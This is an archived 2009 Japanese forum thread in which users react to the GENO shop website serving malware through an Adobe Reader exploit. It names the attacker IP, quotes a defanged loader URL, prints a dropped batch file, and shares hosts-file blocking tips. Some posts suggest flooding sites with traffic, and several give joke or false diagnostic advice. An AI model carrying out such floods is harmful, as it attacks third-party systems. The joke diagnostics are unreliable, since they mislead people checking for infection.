個人情報抜かれてたとしたら諦めとして・・・ウイルススキャンはすぐしないとな

>>291
感染して不安な人、いろいろ質問したい人は

　　/￣￣￣ / 　/''７ ./''７　　　　　　　　/￣/　 /''７
　./ ./￣/　/　　/__/ /　/ 　＿＿＿_　　 ￣　　/　/
　'ー'　_/　/ 　 ＿__ノ　/　 /＿_＿＿/ 　 ＿__ノ　/
　　　/___ノ 　 /＿___,.／　　　　　　　　 /＿___,.／

　　　_ノ￣/　/￣/　 /''７　/￣￣￣/　　　/￣/　　　　　　　　　　　 　/'''７'''７
/￣　　／　　 ￣　　/　/ 　 ￣ ﾌ　./　　　/　　ﾞー-; 　 ＿＿＿_　　　/　/　/.＿
￣/　/　　 　 ＿__ノ　/　 　__／　 (___　　/　 /ｰ--'ﾞ　/＿_＿＿/　_ノ　/i　 i/ ./
　/__/　　　/＿___,.／　　 /___,.ノゝ＿/　/＿/　　　　　　　　　　　/__,／　ゝ､__/

　 　 　 　 　 　 　 　 　 　 　 　 　 　 　 　 　 　 　 　 　 　 　 　 　 　 　が一番（´・ω・） ｽ

conime.exeがある…怖いですと思ったらlynxコマンドプロンプトからだった…
誰かオススメのプロセスマネージャー教えてくれ、なんか妙に気になる…

俺もちょっくらOSクンニリングスしてくるわ

>>290
このリンクみたらやばかったの？

>>296
あるけどどうしたらいいんだ？

とりあえず復元いってくる
普段クレカ銀行とか使ってるから終わってるかもしれんけど・・・

>>289
cmd.exeは出なかったな
メモリ使用量が１．７GB増えたけど

俺もリンク張ったことあるわすまん

何の反応もないぞ？って偉そうに言ってる人が居ますけど
わざわざ「あなた今ウイルスに感染しましたよ」って教えてくれるウイルスなんてあるわけないでしょう？
あほですか

警告が出るのはそれなりに対策してる人だからですよ
ACRの設定JSOFFにしてあるとか検出率高いAVS入れてあるとか

何の反応もないから安全だとか黙っててくれませんか

>>303
被害届けを出したあと、数十時間も放置して被害を広げたとしてgeno訴えてこいよ

firefoxのアドオンnoscriptで
geno.co.jp は許可しているけど
それ以外は許可してない場合も感染する？

94.247.2.195　はブロックされるのかな？

ttp://safeweb.norton.com/report/show?url=http%3A%2F%2Fwww.geno-web.jp%2F&x=15&y=14
ノートン先生は無反応だな

どっかでbatファイル使ってれば関係ないな

>>301
わかんない。

うちはこのスレのリンク先のPC以外にも
ハードウェア板のスレに結構張られてたリンクも踏んでたけど、
今のところ大丈夫っぽい。

結局、PC内にインスコしていたAcrobatReader等のバージョンに左右されちゃうんだと思う。
よくわかんないけど。

>>302
今のところの対応としては今使ってるウイルスソフト一旦アンインスコして
カスペかなんか落としてスキャン
あるいは>>298

でどうしたらいいんだ？物買うときにクレカは使ってないから大丈夫だと思うが

ラトビアだって踏み台なんじゃないの

>>305
29Kの自作kitはそこそこ安かったからな
まあああいうのは別に態とじゃないともうよ
ν速のDELLパケスレで張られてる分では

○アクセスしたときだけ型
　　├ただのブラクラ型
　　├盗むのは特定のネトゲのパスだけ型
　　└パソコンに保存されてる個人情報盗む型
○アクセスしたあともバックドアが残る型
　　├偽のｱﾝﾁｳｲﾙｽｿﾌﾄを買わせるなどのウイルス型
　　└銀行やクレジットカードを使ったりすると、定期的に送信する型


こんな感じか？
どちらも一番下はきついな

特定アジアの犯行の可能性が高い

ゼロなら

新品 PCスレのせいで踏んでしまったやないか
てか毎日のようにGENOみてるから前から抜かれてたかもな

>>314
恐らくね。

conimeはコマンドプロンプトで日本語変換に切り替えると起動して
コマンドプロンプト閉じた後も残る

>>139によるとトレンドマイクロは対応してるようなので
オンラインスキャンかけてみるとか（オンラインが対応済みかわからんけど）

>>316
具体的に何をしているかはすでに解析されてんじゃねぇの？
英語読むのだるいから俺はもう諦めたけど

もしウィルスだとしたら新種かもしれないので、何も反応なしでも実際にはウィルスが発動してるかもしれないよ。
情報漏えい系だとしたら気付かれないように動作するだろうし。
みんな気をつけてね。

基本的にJavaScriptは無効にしておいて、必要のあるときだけ許可とするといいよ。
Firefoxを使ってるならNoScriptがおすすめ。

adblockで
*/94.247.2.195/*
でフィルタかけたらふつうに表示されるようになった

トレンドマイクロのオンラインスキャンどこー？

なんかよう分からんけど、ここに94.247.2.195のことが書かれてる
http://malware-web-threats.blogspot.com/2009/04/black-hat-seo-and-rogue-antivirus-p5.html

ttp://www.trendflexsecurity.jp/security_solutions/housecall_free_scan.php#

ほいトレンドのオンラインスキャン、ＩＥで開けよな！

ここの特価物はJavaScript無効でいけなかったけ？

だれかHTML詳しい人>>308お願いします

ウイルスに引っかかった臭いやつは、
とりあえず各種ｳｲﾙｽソフトが対応するまでパケット監視して、怪しいＩＰをﾏｽｸで遮断しとけばいいんじゃねぇの

一度もカード使ったことがなくて代引きオンリーなのだが
そんな俺でもなんか問題あるのだろうか?

ウイルスかどうかわからんが、やたら重たいのは確か

AVGでスキャンしたら特に問題なかったが
怖いお>ω<

ちょっ怖！

テスト

【ここに面白いこと書いて】
http://www.geno-web.jp/

コピペしてくるから

niftyのオンラインスキャンがカスペ仕様

今のうちにGENOの思い出話でもしておくか・・・

>>330
一番確実なのは踏んだPCのLAN線を引っこ抜いておく事だわな。

>>329
HTML詳しい人でいいのか？ｗ

>>331
genoのサイトに住所氏名電話番号メールアドレスが残ってたら
それをごっそり持っていかれたかもしれない

漏洩がなかったかどうか本格的に調査しようとしたらすごい費用かかるから
genoは何もしなさそうだな・・・

>326
QRB.pdf, WXk.pdｆやらランダムの名前のFile size: 10417 bytesのファイルがダウンされ？
同じくPO.exe, 8lv.exe ...やらFile Size: 15360 Bytesのexeがダウンされる？

お前らチェックしろ

>>326
trojan
偽のセキュリティソフトウェアを売りつけるトロイ
またはFTP・電子メール・その他の保存されてるパスワードを変える

って書いてあるのか？よくわかんね

>>340
javascriptに詳しい人も出来ればｗ

というかお前ら…なんで仮想ＰＣで開かなかったんだよ…

ふひぃ
なんで今日に限ってgeno行くより先にこのスレに気付いたんだ俺
一生分の運使い切ったな

>>329
genoのソース全てを解析したわけじゃないから確かなことは言えないけど、
>>159,207
の件なら大丈夫だと思う

TrendMicroもダメっぽいな

ubuntu+火狐で今開いてるが
何ともないぞ

葱かPG2でパケ監視して、94.247.2.195をブロックしておけば大丈夫じゃないか。

普通怖くて開かないだろ・・・CentOSでwgetぐらいしかできん・・・

macの俺大勝利！

>>290
それポチった。
まだ振り込んでないが・・

>>347
マジありがと！
いつも買い物するサイトはホワイトリストに入れてるんで心配になった

>>342
具体的にどんな情報を持って行ってるか調べるなら、まっさらなPC用意して、わざと引っかかってexeゲットしてから解析か
すんごくだるそうだな


>>329
自分で適当な.js用意して実験すりゃいいじゃん
それ自体はfirefoxの仕様だからfirefoxスレにいけばいいんじゃね

いや激安ＰＣが新しく入ったのかと思って開いたんだよ・・・

こちらのPCを対処する以前に、ここ最近
GENOでなんらかの買い物した人は
情報取られてるわけか。防ぎようがないじゃん。

こういうのを見ると普段はネットワーク上のノイズだからと気にしないFWのブロックのログが
非常に気になってくるｗ

adobereader入れてなかったから感染できなかった。

怖い人は
%systemroot%\system32\drivers\etc\hosts
を開いて

0.0.0.0 94.247.2.195
と書いてからアクセスすればとりあえず安心

http://www.windowsbbs.com/malware-virus-removal/82784-js-script-juliet.html
ここにいくらか情報があった

トレンドのオンラインスキャンが今終わったとこなのだが
なにも検出されなかったけど未対応なのかな
geno開いたら固まって電源長押しで強制終了したんだけど

>>290のやつ買いそびれて涙目だったけどもしや勝ち組なのか

EWF使ってるからCOMMITしないで再起動。
安全宣言出るまでゲノにはアクセスしない。

avastが反応しない奴はwebシールドちゃんと設定してるか確認汁

>>357
GENOは大丈夫でしたとか言うだろうけど
只漏れだろうなｗ

んなわけないか

>>361
PAK_Generic.001は、どうもよくわかりません的な意味っぽいｗ

>>342
System32下のtaskman.exeと同サイズだね。15360って。
もしかしてこれかも知れないと思うけど、
一応MSの頒布ファイルだと思うけど。

taskman.exe
CRC32: 3D718590
MD5: 6828047630AD58CA6EEF58C3222D47E7

そもそもがGENOのサイトってSSL効いてたの？という
知らんけどねｗ

さっき騙されてDTV板で開いちまったよ。

GENOはクレカ使えないのにクレカクレカ騒いでるやつは馬鹿なの?

>>357

＞ GENOでなんらかの買い物した人は
＞ 情報取られてるわけか。



俺ここで499円ポケオト買ってしまったのだが

セキュリティソフト入れてても、さらに最新verに更新してても
突破されてる可能性大なのが怖いね。
script切っとけばいい話だが。これは犠牲者多そうだ。

復元しようとしたらﾌﾞﾙｰｽｸﾘｰﾝで出来んかったわ
ふざけんな

いつでもレタス
全画像読み込み時点でIE8のメモリ使用量が683Mとか行ってるｗ

>>374F8ながおしで起動しる

RSSチェック掛けているんだけど、さっきページファイルが云々っていきなり出たと思ったら
これが原因か。

>>326
＞when running it load

＞hxxp://94.247.2.195/news/?id=10&

＞With an Adobe Collab overflow (CVE-2007-5659)
＞http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-5659

ここに
＞Multiple buffer overflows in Adobe Reader and Acrobat 8.1.1 and earlier allow remote attackers to execute arbitrary code via a PDF file with long arguments to unspecified JavaScript methods.

とあるからAcrobat 8.1.1以前を使い、なおかつJavaScript Onでアクセスしてたらまずアウト

レタスはすごかった
タスクマネージャーが利用できんくなるくらいすごかった

foxit使っててアップデート厨の俺は大丈夫っぽいな

>>371
あくまでgeno経由でウイルスかまされてるわけで、
つまり、ウイルスの種類によっちゃ、クレカを他のサイトで使うと持って行かれる可能性もある。

鯖クラックされたのなら、登録情報も漏れた可能性がある訳だよな?

登録時に使ったパスワードと、似たようなパスを登録メールのパスに使ってた奴とかは、
メールのパスを違うパスに変えた方が良さそうだな。

この店、登録時のパス、メールにそのまま書いて返信してきたのにはﾜﾛﾀ
パスをハッシュ化して保存してない…とかないよな…?

>>378
それを見る限り、AdobeReaderがインストールされてない環境はそんなに深刻ではないのか？

>>272
ｔｈｘ！
GENOの鯖やセキュリティに問題が多そうですね
あと、HP製作者のヒューマンエラーもありそうなんですね

AdobeReaderが入ってない環境だったら大丈夫っぽくないかコレ？
バージョンはよくわからんです

〉〉290のやつ買ったが大丈夫なのか？
住所とメアドぐらいだしそこまで気にして無いが、ちゃんとパソコン届けろよ、金振り込んだぞ

カスペのオンラインスキャンおせえ
せっかくの機会だしウイルスチェックしようと思ったらこれだよ

>>376
thx
RAIDが原因だった・・・orz
めんどくせぇ

短縮作っといた
http://digg.com/u1C1l

>>388
ご愁傷様ｗ

>>387
オンラインスキャンするならBitDefender（コマンドライン版)使う方が早い

が、このマルウェアには対応してないけどｗ

>>391
入れてるけどイインダヨー

この間のノートスレで開いちまったじゃねーか
事と次第によっては謝罪と賠償を要求するぞ

ID:qLe3J/JQ
着々と作戦を進めるなｗｗｗ

トレント・ダウン用マシンがひっかかってみたいだ。。。orz
conime.exe、常駐してたし。。。
ゲノなんて２度と使わねえよ！！！

>>389
iPhoneからはひらけないが、マジなら最低だな

>>395
一応アンチウイルスいれとけよｗｗ踏み台になるぞっうぇｗｗｗｗ

>>389
geno-webへのリンク
JavaScriptを有効にしたまま踏まないように。

>>393
こないだはまだ問題なかった

去年のサウンドハウスを思い出すな

この瞬間も感染者でてるんだろうな・・・・・・
いつになったら閉鎖するんだよ

>>389
通報しておいた

まあでもGENOくらいで良かったんじゃね〜の？ｗ
ワンズとか感染したら何人死人が出るか分からんぞｗ

>>401
田代で503エラーにするという手もある
が、自分も捕まる諸刃の剣

とりあえずブラウザの設定でjava無効にしときゃいいのか

>>404
飛ばされる先に田代すれば

>>392
わかり難いな
ｂｄコマ版入れてるけど
たまには違うエンジンの奴使いたいんだよってことさね
常駐は余計なもんもアレするから嫌いなんだよな

>>405
Java≠JavaScript

システムドライブは保護してるし、
USBアプリばかりだから大丈夫だと思っていたら
IE8-portableがぶっ壊れてたw
まあ丸ごと削除してまた作れば済むから被害は少ないんだけど。

GENOが糞なのは分かった。

>>389
さっそく甜菜活動かい

>>407
うむうむ分かるよ

>>403
うん。
まともな奴はgenoなんかから買わないからなｗ

フロッピードライブ蛾
ﾄﾞﾙｯ！　ﾄﾞﾙﾙﾙﾙﾙﾙﾙﾙﾙｯていうた

acrobat reader 7.0だった；；

>>403
ワンズがきてたら、俺が全力で脂肪してたわ

conime.exeって普通に常駐してるんだろ？ビビらせるなよ・・・

418 ：名無しさん ：sage ：2009/04/04(土) 23:44:34 0
>>386
ずいぶんと子供が増えたな、その板。
http://pc11.2ch.net/test/read.cgi/pc/1237696091/418


413 ： PAC-3(千葉県) ：2009/04/05(日) 00:07:04.60 ID:9Adf0bya
>>403
うん。
まともな奴はgenoなんかから買わないからなｗ
http://tsushima.2ch.net/test/read.cgi/news/1238844402/413

94.247.2.195に繋がらなくすればいいね

>>389
通報しますた

これは怖い

>>406
頭いいなおまえさん
しかし世界レベルで展開してるマルウェアじゃ付け焼き刃かもしれん

>>417
コマンドプロンプトが立ち上がらなければ常駐はしないよ

genoめちゃめちゃ重いな
ウイルス入りなのか

>>418
いきなりおいらのレスを晒してどーすんだよｗ

感染したか知りたいのだけれどどうすればよい？

adobeが9.10なら大丈夫なの？

この手のウイルスってファイアウォールでパケット完全に遮断しておけば被害はでない？
ファイアウォールのパケットフィルターって信用していいのかな？

>>426
過去レス全部見直せｸﾞｽﾞが

foxit+avast+zonealarmの厨房武装最強

Antinir使ってるけど感染したみたい

>>425
ファイ！！　してほしくてｗ

>>427
前のver使ってる人が対応なしで開いてるとほぼOUTなだけで
最新のなら大丈夫だとはいえない。はっきりいって危ないかと。

こんなめにあってはじめて気づいたわ。
ゲノ糞杉

めっちゃおもいAntiVirしね

ノートンにも引っ掛からないようなウイルス忍ばせやがってGENOセキュリティしっかりしろよ。

とりあえずアクロバットリーダー消してみた

adobe readerを突いてるのか
最新版でもだめなら問題だな

>>432
ラウンコ相手には散々戦争したけど、
今時IDすら出ない過疎板相手に戦争しても仕方ないでしょうがｗ

今日の何時からアウトだったのだろうか
午前１時ごろには開いたんだが

もともと重いサイトだから分からない

>>437まてwwどーんと行こうww

あきらめてクリーンインスコしろよｗ
まっさらなのは気持ちいいぞ

心配になってさっきから数十回は開いてるぞ

ｸﾘｰﾝｲﾝｽｺはいいな
俺もこの前したけど、大分すっきりした
各種ﾄﾞﾗｲﾊﾞのｲﾝｽｺが物凄く面倒だったけど

数週間前までは日替わり商品チェックのためにgenoをブラウザ起動した時
自動に開くようにしてたから危なかった…

とりあえず
リンク先に田代打って沈めたほうが安全だと思う

誰か企画した方がいいよ

クリーンインストールはソフト消えるの？
全部C以下に入れたから消えるならやらない

>>427
うちはReaderじゃないAcrobat Ext 9.10だったけど、
今のところ異常なしだけど、
うちはgenoのサイトにアクセスしただけでActiveX等の類は一切動作許可しなかったから、
その辺の個々の環境とかオペレーション内容でケースバイケースだと思うんで、
必ずしも大丈夫と油断しないほうがいいと思う。

Avira9で無反応

よく分からない人はOpera+Avast!の最強伝説にしてまた戻ってこい

>>1
メモリ使いすぎてPC重くなったぞゴラ

カスペでスキャンしたけどなんにも無いぞ
ウイルスとかどうでもいいが、ちゃんとパソコン届くんだろうな？金振り込んだんだぞ

なんでこんなホイホイ踏む奴がいるんだ？

>>428
PDFに何が仕込んであるか分からないけど、自分から拾いに行ってるわけだからだめじゃない？

>>452
genoの最後っ屁かもしれないよ
ご愁傷様です。

>>453
ベアボーンの頃から2日に1回ぐらい見てた

要するに
アクロバットリーダーが勝手に起動
アホみたいにメモリ食ってブラウザ落ちる→強制終了

に覚えがなければ問題ないんだな

>>450
よく分かんないけどOpera+Avast!+COMODO Internet Securityで来ました

AdobeReaderなし、javascript有効、avastで踏んで今さっき再起動してみたが、特に異常はなさそうだ

genoは送料がなあ
と思って1回も買ったことない

ここ数日はLinuxで遊んでgeno覗いてた俺にはセフセフな話か
あーあ、ここは変なガラクタがあるから好きだったのにな

なんじゃこりゃあああああああああああああああああああああああああああああああ

なんかもうすでにいろんなスレに貼られ始めてるね

>>453
ブラクラとか踏んで盛り上がってたら、一緒に踏みたくなるだろ？

昼間AdobeReaderが立ち上げてもないのに突然異常終了したのはこいつのせいか…
FireFox3+AdobeRead8.1.1、avastのWebシールド「高」にしてるけど無反応。
システムの復元した方がいいのか？　マンドクセ。。

ブラウザ落ちたぞ・・・やられたのかやっぱり

>>389があちこちに貼ってるからタチが悪い

貼りまくってる奴は逮捕でおけ

opera何も起きん

>>452
たぶんそちらも大問題になるはず。今回の騒動は
GENOもスルーのままでは済ませられないし。
代引きなら商品こなくても気にすることはないけどね。

固まったが・・・

クラッシュミーなくなったのか
ttp://www.raus.de/crashme

お前ら！
winlogin.exeが起動していたら今すぐタスク消せ！

<html>
<head>
<META HTTP-EQUIV='CHARSET' CONTENT='Shift_JIS'>
<META HTTP-EQUIV='CONTENT-LANGUAGE' CONTENT='Japanese'>
<meta http-equiv='Content-Type' content='text/html; charset=Shift JIS'>
<title>Ap\R?p\Rp[c???Vbvfdmn</title>
<meta name="description" content="IAp\R???VbvfdmnBi@o???BANZX?mF?I">
<meta name="keywords" content="Ap\R,p\R,p\Rp[c,?@,j^,m[gp\R,T[o[,TCN">
<meta name="author" content="GENO">
<meta name="verify-v1" content="9NtgdPv9e8UfOFJPFckDs3EjEAL1qhllG7ieKGSVdXo=" />
</head>
<!--framesetpHTML?body^O???_?Bwin????y[W???B-->
<frameset rows="65,*" border=0 MARGINEWIDTH=0 MARGINHEIGHT=0>
<frame src="TopMenu.html" name=topmenu MARGINWIDTH="0" MARGINHEIGHT="0" scrolling=no noresize>
<frame src="MainMenu.html" name=main MARGINWIDTH="0" MARGINHEIGHT="0" scrolling=auto>
</frameset>

<!-- Google analytics -->
<script src="http://www.google-analytics.com/urchin.js" type="text/javascript">
</script>

<script type="text/javascript">
_uacct = "UA-524772-1";
urchinTracker();
</script>
</html>

<!--//
SourceCheckerOn-line Ver 2.01
//-->

何も起こらないな
/jquery.jsを通じてIEなら/?id=100、それ以外のブラウザなら/?id=101を呼び出しているようだが
どちらを呼び出してもやっていることは時刻を取得してcookieに書き込んでいるだけ
>>207みたいにPDFやflashを呼び出すコードは書かれてないんだよな

アダルトサイトより危険なGENO

ふんじまったわ。あどべりーだーが何か今日調子悪くて
復元したけど、firefox落ちまくった。
オンラインスキャンしたが何もひっかからずだが、
conime.exeは起動してた。

>>464
もちろん要らないPCに砂箱入れてやってるんだよな？
まさか尼で買い物したりいつもメールみてるPCではやってないよな
抜かれたらもうどうしようもないしな

Avast大勝利ですねー

どこのファイルをスキャンすればいいのですか

売王やジェノのおもしろ電子雑貨やジャンク見るのが楽しい

たまたま今日見てなくて良かった

>>473
そんなもの立ち上がってない

ついでだしひさしぶりにクリンインスコすっかなぁ

>>473
winlogon.exeに見せかけた巧妙なウイルスか

システムの復元でもだめか。まだ対応してないのが痛いな。
まー数日で、ノートン先生なりバスター師匠でも
対応はすると思うが、情報に関してはもうね。

最近までプリンタのことで調べまくってたからあぶなかった…
今もう大丈夫なの？

genoは前から２ｃｈ嫌ってるからな、わざと仕込んだんだろうな

hosts弄って接続できなくする奴どうやるんだっけ

>>389
http://tsushima.2ch.net/test/read.cgi/news/1238844402/336
http://tsushima.2ch.net/test/read.cgi/news/1238857124/33
http://tsushima.2ch.net/test/read.cgi/news/1238856989/17
http://namidame.2ch.net/test/read.cgi/car/1236870843/944
http://tsushima.2ch.net/test/read.cgi/news/1238855877/304
http://tsushima.2ch.net/test/read.cgi/news/1238857503/25

誰か故意によるｳｲﾙｽ感染への誘導って事で規制議論に報告ｽﾚ立ててくれ

踏んだ奴は一応PC再起動前する前にレジストリを開いて
Windows起動時に実行するプログラムに登録されている内容を良くチェックしてから再起動したほうがいい。
てか、無闇に再起動すると逆に命取りになる可能性もあるし。

レジストリの項目名がわかんない奴はいじくるつーる等のレジストリを覗けるツールを使って確認するのが良いと思う。
ちなみにいじくるツールはJwordをインスコしない様にくれぐれもインストーラのチェックボックスを良く確認してインスコする様に。

URL短縮無料サービスサイト一覧
全部NG入れるの不可能に近いな、海外にも腐る程あるだろうし

is.gd　短縮URL結果　http://is.gd/****大変短いドメイン
ビギナー向け短縮ＵＲＬサービス　短縮URL結果　http://janp.biz/***
TinyURL.com　短縮URL有名サイト(有名すぎでクリックされない？)
Ama_short(あま・しょーと)URL−amazon.co.jpの長いURLを「ギュッ」と短くするURL圧縮・URL短縮・URL変換・URL転送ウェブサービスです。
究極の短縮URL - xurl.jp　短縮URL　http://xurl.jp/ ****'？'や'％'など余計な記号は入りません。携帯に対応
http://jpan.jp/　短縮URL　http://jpan.jp/?****希望するIDが可能な短縮URLサイトです。
2ch2@短縮URLサービス　短縮URL　http://2ch2.net/.l?=*****　URL自動作成
http://32url.com/　短縮URL　http://32url.com/?****　URL自動作成されます
むぉ〜ぶ　短縮URL　http://mo-v.jp/?****　URL自動作成されます
kandou.biz　短縮URL　サービス停止？
mooo.jp　短縮URL　http://mooo.jp/****URL自動作成
エフエムセブン ドットビズ　短縮URL　http://fm7.biz/***URL自動作成
SnipURL　http://fw.iclub.to/ID　URL自動作成or希望のID作成短縮URL
mixi専用 Bit URL Generator　短縮URL　http://mixi.bz/*　URL自動作成
ust.as 韓国語・英語・日本語の短縮URLフォーム有り　登録制
ESTYLE メルアドの取得ができる短縮URL　http://www.estyle.ne.jp/****/
ＵＲＬ転送サービス　http://fw.iclub.to/ID/ を取得できる短縮URL
JGGJ.NET　Yahoo!に登録されている短縮URL　5種類の転送方法を選択できる
SmarTrans - www3.to 無料URL転送サ-ビス www3.to/***短いURLです
5jp.net　http://5jp.net/***　を取得できる短縮URL
URLを短縮化するサイト　http://jpan.jp/?****　を取得できる短縮URL

>>488
これ？
287 ネット君臨派(兵庫県) New! 2008/09/29(月) 16:49:35.44 ID:T1ofshAP0
C:\WINDOWS\system32\drivers\etc
の
hosts　ファイルに

127.0.0.1[TAB]omanchin.com

を追加しろ
[TAB]はTABキーを一回押せ

これで2度とオマンチンに接続出来なくなる

Sleipnir+Avast!+COMODO Internet Security+spybotで無問題
同じく、Firefox3、Operaでも変化無し。

あした出かけるからそろそろ寝ないといけないのに
パソコンのことが気になって眠れない。。。
こんなにむかついたのローパスの個人情報漏洩以来だわ。

hostsはあくまで名前解決をするものだから、IPアドレスを直に指定されたら無力。
>>359みたいな使い方はできんだろ。

ゲノのサイトを開いただけでアウアウなのか

http://online.drweb.com/result?url=http://www.geno-web.jp/

まだ踏んでないんだけどどうしたらいい？

とりあえず踏んで感染したか否かを確かめる

クラックされたのは www.geno.co.jp だけどgeno-web.jpのサーバも同じ Apache/2.2.3 (CentOS) だから
同じようにやられる穴はありそうだよね。

一応AdBrockで94.247.*.*をブロックするように設定したけど、これでいいの？

一昔前価格コムでもこんな騒動あったよね

http://online.drweb.com/result?url=http://www.geno.co.jp/

開いてめちゃくちゃメモリ使用量増えたけどどうすりゃいいの。

開いたら固まった
メモリ使用量が大変なことになってた
環境は
カスペ
Firefox3
アドベ9.00
だった

時間的に仕方ないがまだGENOの方では対応する気なしか。
今でもお得情報みようと、新たな犠牲者が増殖中の状態とはな。

おれ、つい３日前に代引きで個人情報書き込んで買い物したんだが・・・
注文確認メールがちゃんと届いたからセフセフだよな？

もう夜中だから対応は月曜日かな

>>507
安心したいのは判るが、それだけではなんとも。

>>507
どうやら昨日の10時ごろかららしい。

ちゃんと届いたんなら逆にアウトじゃね？

踏まなくてよかったわ

2日前見た気がしたけどなんともなかったな
とりあえずアク禁設定した

>>507
商品が来るという意味では大丈夫かもしれんが
個人情報の流出という意味では大問題なような
まだGENOのほうで情報把握してないみたいなのが恐ろしい

【客の返品】GENOを語るスレ29【オク出品】
http://pc11.2ch.net/test/read.cgi/pc/1237696091/

本スレ？

>>511
このウィルスとは別に鯖内にあるアカウント情報とか顧客情報が抜かれている可能性もありうるからね。

いずれにしても急にスパムメールがやたら届くようになったなんて場合は
そーいう面でメルアドが流出しちゃってたなんて可能性もありうるし。

>>423
ならあれだ、BDコマンドプロンプト版を使ったからかも知れんな

>>506のアドレスって何？
これもgenoへの短縮リンクか何か？

Chromeはシークレットモードなら大丈夫かね

実店舗はないの？
普通あるよな

間違えた・・・>>503のリンクだ

ここ、誠意の無さで有名だもんね

本スレには社員が常駐してるから知ってはいるんじゃないの

FIREFOX3とIE7が固まった（PFがひどいことになった）
Chromeは何もおきなかった
HP製作者がなにかチョンボしたんじゃないの？
ちなみにこのサイトを見ても94.247.2.195につなぎに行こうとはしない
>>1が別のサイトで変なウイルス引っ掛けてきたんじゃないの？

今日Genoのサイト見た後Paypalのアカ作って海外通販使った俺終わったな

知らずにTOPページアクセスしたけど開くのに時間掛かったけどアドビリーダー6.0は起動しなかったぞ
セフセフ？

firefoxで繋ぐと94.247.2.195となんかやってるね

ここ最近2ちゃんでおもちゃにされてたから復讐のつもりで知ってて放置してんじゃねえのｗ

>>518
いや全然短縮されてないだろｗ

あぶねー…今のOSを入れる際にAcrobat Readerはすぐ消してFoxit Readerに切り替え、
JavaとJavascriptは基本的に無効にしていたから助かった。
こうなるとGENOの顧客情報管理サーバもやられていると考えるべきだよね？
一度でも買い物をした人は情報ゴッソリもって行かれたのか？

評判悪いのか

さっきまでドスパラとかワンズで新規に組むPCの見積もりしてたからマジで焦った
よかったgeno使ったこと無くて・・・マジでこういうの心臓に悪いからやめてほしい

夕方ゲノみて今このスレみてるんだが・・・
タスクマネージャー眺めてるとcmd.exeが定期的に動いてるＷＷＷ
アウアウだよな?

>>533
そりゃあもうお前やばいってもんじゃないｗｗｗｗｗっうぇっうぇｗｗｗ
ブラウザからお前のハードディスク丸見えｗｗっうぇｗｗｗ












ﾊｰｽｯｷﾘした

>>533
俺何回もゲノ開いてるけどそんな症状にならないよ？

ルートにu.batってのが作られてたorz
中身は以下のとおり

:Z
DeL "K:\_.t"
IF EXIST "K:\_.t" GOTO Z
DeL "K:\u.bat"

こことは関係ないかもしれんが何かにやられたのか確実だorz

>>531
怪しいものが多い

少し前、LGのDVD-Rドライブの偽物(型番だけ合わせた改変ファーム入り)が出回ったときも
売り続けたのはここだったし

修正済みの脆弱性なのかな
ゼロデイでは無いの？

>>500
2年も更新してないのか

タスクマネージャで System Idle Process ってのがCPU食いまくってる奴は
恐らく感染してる。注意しろよ！！

ここのサイト作ってる会社に面接行ったんだがｗ

今時ジャバスクOFFなんて時代遅れとか言ってた奴らはどこ行ったよ

>>541
それだ！

Adobe Reader ってデフォルトではブラウザの中に起動されるんじゃないか？
小さく起動してたら気付かないと思うぞ？

>>541
0.1の会社かｗ

>>540
そういうことはいわないのw
ここ二・三日に踏んだかどうか覚えてない人はどうやって確認できるかな？
記憶があいまいなんだよな

>>10のベンチマークしたら、IEが落ちた。
メモリ増やそうかな・・・
http://www.dotup.org/uploda/www.dotup.org24567.png

踏んでなくてセーフなんだが参考までに情報をくれ
AntiVirとかAvastは反応したの？
あと本物のタスマネはなんて名前なんだ？

昨日バスターの不正変更の監視が反応したのはこれだったのかな。
~.exeがどうのこうのって出たんで拒否したけど間に合わなかったのか？

>>527
アドベリーダーには丸ウェア入ってるからそれじゃない？

〜exeあったら危険、どうすればいい？

いつからこんなVIP臭いレスするようになったんだ

>>547
なんでそんなWindows95みたいなスキンにしてんの？

>>551
VIPが出来る前からだよ。

＞なんでそんなWindows95みたいなスキンにしてんの？
ｷﾘｯ

AA略

だっておｗｗｗｗｗｗｗｗｗｗｗｗｗ

>>552
軽くなるらしいよ
成田の入管もそのスキンだった

>>536
http://anubis.iseclab.org/?action=result&task_id=1890669b0bd937574e5be45e24c63ea80&format=html
http://www.threatexpert.com/report.aspx?md5=791509d03706cbc8883536b5131341d4
http://info.prevx.com/aboutprogramtext.asp?PX5=553B1FA200AA99603C6800E34911BA008604CE7A

u.batが作成されるようだな

スパイボットで検索してたら何種かトロイが出てきた

>>10
カテゴリ表示で大量の記事表示される訳か
1ページ制限とか無いのかね

XPではThemeサービス止めるのがデフォだろ

>>536
>>556
http://www.spycheck.co.uk/genera.php?processfile=u.bat&dir=u&pag=1
プログラムはウィルスを作るために作られました
100〜1000のそれぞれ違うウィルスを作り動作させることができます
だって

>>552
つーかフォントが汚いｗ

>>10
表示できたけどせっかくの細かい情報が台無しブログだわこれもったいないねこういうの
ttp://ranobe.sakuratan.com/up/src/up350011.png

>>556
>>560
完全ウイルスワロタしかもやっかい

今別領域から立ち上げてノートンでオンラインチェック中orz
バスターではかすりもしなかった。

ノートンやっても無駄じゃね
上の方に書いてあるがこのウイルスの対応状況らしい
http://www.virustotal.com/analisis/48cfd289b06a1fb46dfbcb9fc8bad17a

カスペですら突破されてるのにバスター・ノートンなんて
遅延対応ソフトが検出できるはずがない。
でも自己設定次第だがフリーAVASTはブロックしてるらしいな。

今月の2日に見つかったおニューなウイルスって書いてあるな

結局、どうすればいいの？

>>10
ふざけんなよ
いきなりメモリ７００M近く持ってたぞ
CPUも８０％平均だし

おおー万全を期して4/1に戻した俺イカス

レタスの中の人何故だか人来るな〜って精力的に頑張ってるんだろうなｗ

これを機にアンチウィルスだけじゃなくて砂箱入れるようにしたほうが良いよ
被害が少しは減少するから

ノーガードで踏んでも感染しないんだが

ちなみにGENOのシステム作ってるところはここな。
http://www.it-solution.jp/casestudy/geno/index.html

＞PC・周辺機器、OA危機のリサイクル・リユース販売を手がけ、
本当に危機だぞ。

送信先わかってるんでしょ？
みんな飽和攻撃してるのか？すでに。

384 名無しさん＠編集中 sage 2009/04/05(日) 01:19:25 ID:MCOisT8p
いまシステムの復元してウィルスチェックしているが
よくわからん
再インストしてローレベルフォーマットしないと
ダメかな？


385 名無しさん＠編集中 sage 2009/04/05(日) 01:31:08 ID:Bvc2ZB43
ウイルス感染でパーテ開放→クイックフォーマットてのはやった事あるが、
ローレベルフォーマットまでやった事は無いな・・・
もしかして間違った対処してたのか・・？


386 名無しさん＠編集中 sage 2009/04/05(日) 01:43:51 ID:60tVy6Z1
>>361
マジで通報しました
